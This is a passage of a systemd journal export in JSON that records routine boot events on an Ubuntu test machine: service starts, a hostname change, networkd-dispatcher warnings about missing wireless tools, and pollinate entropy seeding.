"616c38d09ecf41b98f0a3c178beaa4b6", "MESSAGE" : "Started Hold until boot process finishes up.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818433141" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=327;b=e2b08827b5804427b422c10c84f1567e;m=2a63cc0;t=5bd16df69bc27;x=1c70448b37921d8c", "__REALTIME_TIMESTAMP" : "1615280818732071", "__MONOTONIC_TIMESTAMP" : "44448960", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Serial Getty on ttyS0.", "UNIT" : "serial-getty@ttyS0.service", "INVOCATION_ID" : "6962682f850d410ab6ab4947892896cc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818438851" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=328;b=e2b08827b5804427b422c10c84f1567e;m=2a63d13;t=5bd16df69bc7b;x=75b6885bd4fa244b", "__REALTIME_TIMESTAMP" : "1615280818732155", "__MONOTONIC_TIMESTAMP" : "44449043", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", 
"_HOSTNAME" : "test-1", "MESSAGE" : "Starting Set console scheme...", "UNIT" : "setvtrgb.service", "INVOCATION_ID" : "f1b78fb9a2b84e2fa897cc4f1b9c2dbc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818446792" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=329;b=e2b08827b5804427b422c10c84f1567e;m=2a63d6b;t=5bd16df69bcd3;x=19536e76eaf38387", "__REALTIME_TIMESTAMP" : "1615280818732243", "__MONOTONIC_TIMESTAMP" : "44449131", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "plymouth-quit.service", "INVOCATION_ID" : "c345885054b24af6bf1126493e521c75", "MESSAGE" : "Started Terminate Plymouth Boot Screen.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818453725" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32a;b=e2b08827b5804427b422c10c84f1567e;m=2a63dbe;t=5bd16df69bd25;x=42e6870cfd4a68a1", "__REALTIME_TIMESTAMP" : "1615280818732325", "__MONOTONIC_TIMESTAMP" : "44449214", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" 
: "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "setvtrgb.service", "INVOCATION_ID" : "f1b78fb9a2b84e2fa897cc4f1b9c2dbc", "MESSAGE" : "Started Set console scheme.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818468121" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32b;b=e2b08827b5804427b422c10c84f1567e;m=2a63e19;t=5bd16df69bd80;x=7c36cebfe0645687", "__REALTIME_TIMESTAMP" : "1615280818732416", "__MONOTONIC_TIMESTAMP" : "44449305", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Created slice system-getty.slice.", "UNIT" : "system-getty.slice", "INVOCATION_ID" : "125f02b327ec465b96e4c10b0e9ba337", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818470911" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32c;b=e2b08827b5804427b422c10c84f1567e;m=2a63e65;t=5bd16df69bdcd;x=aef5fe72952f47d", "__REALTIME_TIMESTAMP" : "1615280818732493", "__MONOTONIC_TIMESTAMP" : "44449381", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", 
"_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Getty on tty1.", "UNIT" : "getty@tty1.service", "INVOCATION_ID" : "8b46541929ef4e8aadfe0703f2a81028", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818480081" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32d;b=e2b08827b5804427b422c10c84f1567e;m=2a63ebb;t=5bd16df69be22;x=6b1b08f772d95efd", "__REALTIME_TIMESTAMP" : "1615280818732578", "__MONOTONIC_TIMESTAMP" : "44449467", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Login Prompts.", "UNIT" : "getty.target", "INVOCATION_ID" : "e1ddb495fc2f4c12b84162798cccd2bb", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818484008" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32e;b=e2b08827b5804427b422c10c84f1567e;m=2a644a6;t=5bd16df69c40e;x=8ac4ec612bb0b149", "__REALTIME_TIMESTAMP" : "1615280818734094", "__MONOTONIC_TIMESTAMP" : 
"44450982", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "grub-common.service", "INVOCATION_ID" : "ba0792509caa4bd78d4591f02aac479a", "MESSAGE" : "Started LSB: Record successful boot for GRUB.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818497851" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32f;b=e2b08827b5804427b422c10c84f1567e;m=2a64531;t=5bd16df69c498;x=537110d2c3197afd", "__REALTIME_TIMESTAMP" : "1615280818734232", "__MONOTONIC_TIMESTAMP" : "44451121", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "apport.service", "INVOCATION_ID" : "db150c2b16db4500a24a8de7446fee26", "MESSAGE" : "Started LSB: automatic crash report generation.", 
"_SOURCE_REALTIME_TIMESTAMP" : "1615280818508165" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=330;b=e2b08827b5804427b422c10c84f1567e;m=2a64594;t=5bd16df69c4fb;x=c27d5488bc1c525f", "__REALTIME_TIMESTAMP" : "1615280818734331", "__MONOTONIC_TIMESTAMP" : "44451220", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "polkit.service", "INVOCATION_ID" : "f8c33888140c415190c7d25f87c0b41e", "MESSAGE" : "Started Authorization Manager.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818552924" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=331;b=e2b08827b5804427b422c10c84f1567e;m=2a645de;t=5bd16df69c545;x=e5031d2cf2fb0f22", "__REALTIME_TIMESTAMP" : "1615280818734405", "__MONOTONIC_TIMESTAMP" : "44451294", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", 
"JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "accounts-daemon.service", "INVOCATION_ID" : "fb8c38edec2345e7ac064ca6e9088f83", "MESSAGE" : "Started Accounts Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818557033" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=332;b=e2b08827b5804427b422c10c84f1567e;m=2a64624;t=5bd16df69c58c;x=10c48f30b9fda882", "__REALTIME_TIMESTAMP" : "1615280818734476", "__MONOTONIC_TIMESTAMP" : "44451364", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-hostnamed.service", "INVOCATION_ID" : "3e22be523ca64c5ebd2db6de34390f63", "MESSAGE" : "Started Hostname Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818634669" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=333;b=e2b08827b5804427b422c10c84f1567e;m=2a64671;t=5bd16df69c5d9;x=8b8d263511ef7d30", "__REALTIME_TIMESTAMP" : "1615280818734553", "__MONOTONIC_TIMESTAMP" : "44451441", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/hostname/hostnamed.c", "CODE_LINE" : "483", "CODE_FUNC" : 
"method_set_hostname", "SYSLOG_IDENTIFIER" : "systemd-hostnamed", "MESSAGE" : "Changed host name to 'host-192-168-10-95'", "_PID" : "827", "_COMM" : "systemd-hostnam", "_EXE" : "/lib/systemd/systemd-hostnamed", "_CMDLINE" : "/lib/systemd/systemd-hostnamed", "_CAP_EFFECTIVE" : "200000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-hostnamed.service", "_SYSTEMD_UNIT" : "systemd-hostnamed.service", "_SYSTEMD_INVOCATION_ID" : "3e22be523ca64c5ebd2db6de34390f63", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818700892" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=334;b=e2b08827b5804427b422c10c84f1567e;m=2a95fca;t=5bd16df6cdf31;x=82aea42c373bff27", "__REALTIME_TIMESTAMP" : "1615280818937649", "__MONOTONIC_TIMESTAMP" : "44654538", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "98b8e18cae2b44329dd2b99cfc8ca266", "SYSLOG_IDENTIFIER" : "networkd-dispatcher", "MESSAGE" : "No valid path found for iwconfig", "_PID" : "778", "_COMM" : "networkd-dispat", "_CMDLINE" : "/usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers", "_SYSTEMD_CGROUP" : "/system.slice/networkd-dispatcher.service", "_SYSTEMD_UNIT" : "networkd-dispatcher.service", "_SYSTEMD_INVOCATION_ID" : "83ebf910c7064affa22dd95766ea1937" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=335;b=e2b08827b5804427b422c10c84f1567e;m=2a9702b;t=5bd16df6cef93;x=613965ac6fdc269a", "__REALTIME_TIMESTAMP" : "1615280818941843", "__MONOTONIC_TIMESTAMP" : "44658731", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : 
"system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "98b8e18cae2b44329dd2b99cfc8ca266", "SYSLOG_IDENTIFIER" : "networkd-dispatcher", "_PID" : "778", "_COMM" : "networkd-dispat", "_CMDLINE" : "/usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers", "_SYSTEMD_CGROUP" : "/system.slice/networkd-dispatcher.service", "_SYSTEMD_UNIT" : "networkd-dispatcher.service", "_SYSTEMD_INVOCATION_ID" : "83ebf910c7064affa22dd95766ea1937", "MESSAGE" : "No valid path found for iw" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=336;b=e2b08827b5804427b422c10c84f1567e;m=2aa0b15;t=5bd16df6d8a7d;x=a341e91927040427", "__REALTIME_TIMESTAMP" : "1615280818981501", "__MONOTONIC_TIMESTAMP" : "44698389", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "networkd-dispatcher.service", "INVOCATION_ID" : "83ebf910c7064affa22dd95766ea1937", "MESSAGE" : "Started Dispatcher daemon for systemd-networkd.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818978129" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=337;b=e2b08827b5804427b422c10c84f1567e;m=2aac31b;t=5bd16df6e4282;x=2b8e71bb2b69ee26", "__REALTIME_TIMESTAMP" : "1615280819028610", "__MONOTONIC_TIMESTAMP" : "44745499", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" 
: "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "MESSAGE" : "AppArmor status: apparmor is enabled and all features are available", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=338;b=e2b08827b5804427b422c10c84f1567e;m=2ae32b7;t=5bd16df71b21f;x=cf28ad7faf15f310", "__REALTIME_TIMESTAMP" : "1615280819253791", "__MONOTONIC_TIMESTAMP" : "44970679", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_CAP_EFFECTIVE" : "0", "SYSLOG_FACILITY" : "1", "SYSLOG_IDENTIFIER" : "pollinate", "SYSLOG_PID" : "787", "_UID" : "110", "_GID" : "1", "MESSAGE" : "client verified challenge/response with [https://entropy.ubuntu.com/]", "_PID" : "901", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "_CMDLINE" : "logger --id=787 -t pollinate client verified challenge/response with [https://entropy.ubuntu.com/]", "_SYSTEMD_CGROUP" : "/system.slice/pollinate.service", "_SYSTEMD_UNIT" : "pollinate.service", "_SYSTEMD_INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819253685" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=339;b=e2b08827b5804427b422c10c84f1567e;m=2ae7e71;t=5bd16df71fdd8;x=e62c3f540e40b1a0", "__REALTIME_TIMESTAMP" : "1615280819273176", "__MONOTONIC_TIMESTAMP" : "44990065", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_CAP_EFFECTIVE" : "0", "SYSLOG_FACILITY" : "1", "SYSLOG_IDENTIFIER" : "pollinate", "SYSLOG_PID" : "787", "_UID" : "110", "_GID" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "_SYSTEMD_CGROUP" : "/system.slice/pollinate.service", "_SYSTEMD_UNIT" : "pollinate.service", "_SYSTEMD_INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "MESSAGE" : "client hashed response from [https://entropy.ubuntu.com/]", "_PID" : "909", "_CMDLINE" : "logger --id=787 -t pollinate client hashed response from [https://entropy.ubuntu.com/]", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819273149" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33a;b=e2b08827b5804427b422c10c84f1567e;m=2ae93e9;t=5bd16df721350;x=37ab24b8f1ef2da3", "__REALTIME_TIMESTAMP" : "1615280819278672", "__MONOTONIC_TIMESTAMP" : "44995561", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "lxd-containers.service", "INVOCATION_ID" : "69bb4a33e4a84106a814b4eb83881d94", "MESSAGE" : "Started LXD - container startup/shutdown.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819276209" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33b;b=e2b08827b5804427b422c10c84f1567e;m=2ae9eec;t=5bd16df721e53;x=c7bc168b61122055", "__REALTIME_TIMESTAMP" : "1615280819281491", "__MONOTONIC_TIMESTAMP" : "44998380", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_CAP_EFFECTIVE" : "0", "SYSLOG_FACILITY" : "1", "SYSLOG_IDENTIFIER" : "pollinate", "SYSLOG_PID" : "787", "_UID" : "110", "_GID" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "_SYSTEMD_CGROUP" : "/system.slice/pollinate.service", "_SYSTEMD_UNIT" : "pollinate.service", "_SYSTEMD_INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "MESSAGE" : "client successfully seeded [/dev/urandom]", "_PID" : "910", "_CMDLINE" : "logger --id=787 -t pollinate client successfully seeded [/dev/urandom]", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819281481" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33c;b=e2b08827b5804427b422c10c84f1567e;m=2aeaaea;t=5bd16df722a51;x=69130601c522a0a9", "__REALTIME_TIMESTAMP" : "1615280819284561", "__MONOTONIC_TIMESTAMP" : "45001450", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", 